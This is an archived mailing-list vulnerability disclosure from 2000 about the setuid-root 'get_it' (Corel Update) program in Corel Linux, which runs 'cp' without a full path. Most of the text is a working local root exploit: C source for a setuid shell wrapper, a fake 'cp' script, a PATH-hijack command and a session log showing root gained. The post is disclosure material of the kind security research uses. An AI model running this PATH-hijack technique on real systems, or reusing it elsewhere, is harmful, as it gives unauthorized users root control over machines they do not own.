Corel Linux comes with a program called "Corel Update" to manage the
".deb" files. This X oriented program is setuid root. The program is
"get_it" and it's located in the /usr/X11R6/bin directory.
If you can run it, it's easy to get root privileges in your system.
It copies two files to the temp directory, taking no care to verify how.
In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!!
The only thing you have to do to hack root, is to change your PATH
to execute your personal copy of the program.
Let's see the example.
------------------------------ From here --------------------------------
Script started on Wed Jan 12 01:58:17 2000
CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>
main(argc,argv)
int argc;
char **argv;
{
if (argc==2);
setuid(atoi(argv[1]));
execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
Script done on Wed Jan 12 01:59:12 2000
---------------------------- To Here -----------------------------------
Easy to patch, isn't it?
*****************************************************************************
/ Cesar Tascon Alvarez
( to ) ? be : !be / University of Valladolid
/ (Spain)
W. Shakespeare / tasconat_private
/
*****************************************************************************
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:51 PDT